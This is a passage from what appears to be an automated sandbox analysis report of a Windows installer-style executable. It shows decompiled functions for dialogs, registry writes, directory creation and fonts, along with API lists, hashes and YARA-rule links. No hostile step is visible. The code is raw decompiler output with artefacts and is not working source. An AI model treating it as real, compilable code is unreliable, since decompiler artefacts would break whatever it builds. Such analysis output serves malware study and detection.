				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                    0x00401ccb
                                                                                                    0x00401cd2
                                                                                                    0x00401d01
                                                                                                    0x00401d09
                                                                                                    0x00401d10
                                                                                                    0x00401d10
                                                                                                    0x0040288e
                                                                                                    0x0040289a

                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32 ref: 00401CC5
                                                                                                    • GetClientRect.USER32 ref: 00401CD2
                                                                                                    • LoadImageA.USER32 ref: 00401CF3
                                                                                                    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1849352358-0
                                                                                                    • Opcode ID: 47ad6de393feb96187dd9ee3787fe0bc90ccbb9e28408000d5abfd2faceca4c9
                                                                                                    • Instruction ID: de7316f9b9f1bcc3f0c1dff9ae5dc63c91f1472c52c052d8cf8a0da7f27950be
                                                                                                    • Opcode Fuzzy Hash: 47ad6de393feb96187dd9ee3787fe0bc90ccbb9e28408000d5abfd2faceca4c9
                                                                                                    • Instruction Fuzzy Hash: D5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004046F1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 51%
                                                                                                    			E004046F1(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405B88(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405B88(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405B88(_t34, 0, 0x4204a0, 0x4204a0, _a8);
				wsprintfA(_t26 + lstrlenA(0x4204a0), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x4204a0);
			}













                                                                                                    0x004046f9
                                                                                                    0x004046fd
                                                                                                    0x00404705
                                                                                                    0x00404708
                                                                                                    0x00404709
                                                                                                    0x0040470b
                                                                                                    0x0040470d
                                                                                                    0x00404710
                                                                                                    0x00404710
                                                                                                    0x00404717
                                                                                                    0x0040471d
                                                                                                    0x0040471d
                                                                                                    0x00404724
                                                                                                    0x0040472f
                                                                                                    0x00404730
                                                                                                    0x00404733
                                                                                                    0x00404733
                                                                                                    0x00404740
                                                                                                    0x0040474b
                                                                                                    0x0040474e
                                                                                                    0x00404760
                                                                                                    0x00404767
                                                                                                    0x00404768
                                                                                                    0x00404777
                                                                                                    0x00404787
                                                                                                    0x004047a3

                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(004204A0,004204A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404611,000000DF,0000040F,00000400,00000000), ref: 0040477F
                                                                                                    • wsprintfA.USER32 ref: 00404787
                                                                                                    • SetDlgItemTextA.USER32 ref: 0040479A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                    • String ID: %u.%u%s%s
                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                    • Opcode ID: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
                                                                                                    • Instruction ID: e1128f73888b2767c9277aed1687fd20c93e739cc52df1aac9c0a45a5a8dde9d
                                                                                                    • Opcode Fuzzy Hash: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
                                                                                                    • Instruction Fuzzy Hash: 7311E2736001243BDB10666D9C46EEF3699DBC6335F14423BFA25F61D1E938AC5286A8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 51%
                                                                                                    			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405AC4();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                    0x00401bb6
                                                                                                    0x00401bc2
                                                                                                    0x00401bc5
                                                                                                    0x00401bce
                                                                                                    0x00401bce
                                                                                                    0x00401bd1
                                                                                                    0x00401bd5
                                                                                                    0x00401bde
                                                                                                    0x00401bde
                                                                                                    0x00401be1
                                                                                                    0x00401be5
                                                                                                    0x00401be7
                                                                                                    0x00401c34
                                                                                                    0x00401c36
                                                                                                    0x00401c3f
                                                                                                    0x00401c47
                                                                                                    0x00401c4a
                                                                                                    0x00401c4a
                                                                                                    0x00401c53
                                                                                                    0x00000000
                                                                                                    0x00401be9
                                                                                                    0x00401bf0
                                                                                                    0x00401bf2
                                                                                                    0x00401bfa
                                                                                                    0x00401bfd
                                                                                                    0x00401c25
                                                                                                    0x00401c59
                                                                                                    0x00401c59
                                                                                                    0x00401bff
                                                                                                    0x00401c0d
                                                                                                    0x00401c15
                                                                                                    0x00401c18
                                                                                                    0x00401c18
                                                                                                    0x00401bfd
                                                                                                    0x00401c5c
                                                                                                    0x00401c5f
                                                                                                    0x00401c65
                                                                                                    0x00402833
                                                                                                    0x00402833
                                                                                                    0x0040288e
                                                                                                    0x0040289a

                                                                                                    APIs
                                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Timeout
                                                                                                    • String ID: !
                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                    • Opcode ID: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                    • Instruction ID: 67abd366a37910a3fb0c7fe19d632a25016d3899897cc5a5bd850e91adcb6683
                                                                                                    • Opcode Fuzzy Hash: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                    • Instruction Fuzzy Hash: B721C4B1A44209BFEF01AFB4CE4AAAE7B75EF44344F14053EF602B60D1D6B84980E718
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402303, Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 90%
                                                                                                    			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AEB(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029F6(0x23);
						_t19 = lstrlenA(0x40a370) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029D9(3);
						 *0x40a370 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F18(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a370, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a370, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}










                                                                                                    0x00402304
                                                                                                    0x00402309
                                                                                                    0x00402313
                                                                                                    0x0040231d
                                                                                                    0x00402320
                                                                                                    0x00402330
                                                                                                    0x0040233a
                                                                                                    0x00402341
                                                                                                    0x00402349
                                                                                                    0x00402357
                                                                                                    0x0040235b
                                                                                                    0x00402366
                                                                                                    0x00402366
                                                                                                    0x0040236a
                                                                                                    0x0040236e
                                                                                                    0x00402374
                                                                                                    0x00402379
                                                                                                    0x00402379
                                                                                                    0x0040237d
                                                                                                    0x00402389
                                                                                                    0x00402389
                                                                                                    0x004023a2
                                                                                                    0x004023a4
                                                                                                    0x004023a4
                                                                                                    0x004023a7
                                                                                                    0x0040247d
                                                                                                    0x0040247d
                                                                                                    0x0040288e
                                                                                                    0x0040289a

                                                                                                    APIs
                                                                                                    • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
                                                                                                    • lstrlenA.KERNEL32(0040A370,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
                                                                                                    • RegSetValueExA.ADVAPI32(?,?,?,?,0040A370,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,0040A370,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1356686001-0
                                                                                                    • Opcode ID: 0d912550fec3f9f8d88ce66a9dd59e794c39c4af8948ea658bb3eb1a01dd5f7d
                                                                                                    • Instruction ID: d7b132d9018d44432a73f3315d2b91b6aa1600c7a927e9fa70905f900517fa5a
                                                                                                    • Opcode Fuzzy Hash: 0d912550fec3f9f8d88ce66a9dd59e794c39c4af8948ea658bb3eb1a01dd5f7d
                                                                                                    • Instruction Fuzzy Hash: BA1160B1E00209BFEB10AFA0DE49EAF767CFB54398F10413AF905B61D0D7B85D019669
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004015B3, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 83%
                                                                                                    			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				struct _SECURITY_ATTRIBUTES* _t20;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E004056ED(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405684(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						if(CreateDirectoryA(_t25, _t23) == 0 && (GetLastError() != 0xb7 || (GetFileAttributesA(_t25) & 0x00000010) == 0)) {
							 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B66(0x429800, _t25);
					SetCurrentDirectoryA(_t25);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}









                                                                                                    0x004015b3
                                                                                                    0x004015ba
                                                                                                    0x004015bd
                                                                                                    0x004015c2
                                                                                                    0x004015c6
                                                                                                    0x004015c8
                                                                                                    0x004015d0
                                                                                                    0x004015d6
                                                                                                    0x004015d8
                                                                                                    0x004015e3
                                                                                                    0x004015fd
                                                                                                    0x004015fd
                                                                                                    0x00401600
                                                                                                    0x00401603
                                                                                                    0x00401605
                                                                                                    0x00401606
                                                                                                    0x004015c8
                                                                                                    0x0040160d
                                                                                                    0x0040162d
                                                                                                    0x00402164
                                                                                                    0x0040160f
                                                                                                    0x00401611
                                                                                                    0x0040161c
                                                                                                    0x00401622
                                                                                                    0x00401622
                                                                                                    0x0040288e
                                                                                                    0x0040289a

                                                                                                    APIs
                                                                                                      • Part of subcall function 004056ED: CharNextA.USER32(0040549F,?,004218A8,00000000,00405751,004218A8,004218A8,?,?,00007866,0040549F,?,00429000,00007866), ref: 004056FB
                                                                                                      • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 00405700
                                                                                                      • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 0040570F
                                                                                                    • CreateDirectoryA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                    • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000,00429800,00000000,00000000,000000F0), ref: 00401622
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3751793516-0
                                                                                                    • Opcode ID: 635350211d8055eba2decc5f585223b7a791cf162a7a1a4d9837acd4562bfbbb
                                                                                                    • Instruction ID: c38907cd9fbddcdb820990ab727de55d75fa8bca08f123d111df4852c942a759
                                                                                                    • Opcode Fuzzy Hash: 635350211d8055eba2decc5f585223b7a791cf162a7a1a4d9837acd4562bfbbb
                                                                                                    • Instruction Fuzzy Hash: 7E010431D08141AFDB216F751D4497F27B0AA56369728073FF891B22E2C63C0942962E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 85%
                                                                                                    			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029F6(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405AC4(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405AC4(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                                                                                    0x00401ec7
                                                                                                    0x00401ecf
                                                                                                    0x00401ed4
                                                                                                    0x00401ed9
                                                                                                    0x00401edd
                                                                                                    0x00401ee0
                                                                                                    0x00401ee2
                                                                                                    0x00401ee9
                                                                                                    0x00401ef2
                                                                                                    0x00401efa
                                                                                                    0x00401efd
                                                                                                    0x00401f12
                                                                                                    0x00401f18
                                                                                                    0x00401f2b
                                                                                                    0x00401f34
                                                                                                    0x00401f40
                                                                                                    0x00401f45
                                                                                                    0x00401f45
                                                                                                    0x00401f2b
                                                                                                    0x00401f48
                                                                                                    0x00401b75
                                                                                                    0x00401b75
                                                                                                    0x00401efd
                                                                                                    0x0040288e
                                                                                                    0x0040289a

                                                                                                    APIs
                                                                                                    • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                                    • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                                    • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                      • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1404258612-0
                                                                                                    • Opcode ID: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                    • Instruction ID: 178fa6cf4330108057832d0c189c0e5a27020503733a18e797ef1cc5e9d7aef6
                                                                                                    • Opcode Fuzzy Hash: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                    • Instruction Fuzzy Hash: 52113A71A00108BEDB01EFA5DD819AEBBB9EB48344B20853AF501F61E1D7389A54DB28
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 67%
                                                                                                    			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af74->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
				 *0x40af84 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af8b = 1;
				 *0x40af88 = _t11 & 0x00000001;
				 *0x40af89 = _t11 & 0x00000002;
				 *0x40af8a = _t11 & 0x00000004;
				E00405B88(_t18, _t24, _t26, 0x40af90,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af74);
				_push(_t14);
				_push(_t26);
				E00405AC4();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                                    0x00401d29
                                                                                                    0x00401d42
                                                                                                    0x00401d4c
                                                                                                    0x00401d51
                                                                                                    0x00401d5c
                                                                                                    0x00401d63
                                                                                                    0x00401d75
                                                                                                    0x00401d7b
                                                                                                    0x00401d80
                                                                                                    0x00401d8a
                                                                                                    0x004024b8
                                                                                                    0x00401561
                                                                                                    0x00402833
                                                                                                    0x0040288e
                                                                                                    0x0040289a

                                                                                                    APIs
                                                                                                    • GetDC.USER32(?), ref: 00401D22
                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                    • CreateFontIndirectA.GDI32(0040AF74), ref: 00401D8A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: CapsCreateDeviceFontIndirect
                                                                                                    • String ID:
                                                                                                    • API String ID: 3272661963-0
                                                                                                    • Opcode ID: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
                                                                                                    • Instruction ID: d83410998d1654a5337f8c322709d39cf2ce3a8a4f0330bc6585c9693e616625
                                                                                                    • Opcode Fuzzy Hash: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
                                                                                                    • Instruction Fuzzy Hash: E1F044F1A45342AEE7016770AE0ABA93B649725306F100576F541BA1E2C5BC10149B7F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AB645B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 26%
                                                                                                    			E00AB645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0xb7d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E00ACFA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E00AA2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E00A9FFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0xb7b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E00ACB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                                                                                    0x00ab645b
                                                                                                    0x00ab6463
                                                                                                    0x00ab646d
                                                                                                    0x00ab6475
                                                                                                    0x00ab647a
                                                                                                    0x00ab647e
                                                                                                    0x00ab6480
                                                                                                    0x00ab648c
                                                                                                    0x00ab6490
                                                                                                    0x00ab6495
                                                                                                    0x00ab6498
                                                                                                    0x00ab649b
                                                                                                    0x00ab649f
                                                                                                    0x00ab64a1
                                                                                                    0x00af7c07
                                                                                                    0x00af7c09
                                                                                                    0x00af7c0c
                                                                                                    0x00000000
                                                                                                    0x00ab64a7
                                                                                                    0x00ab64a7
                                                                                                    0x00ab64aa
                                                                                                    0x00af7bf7
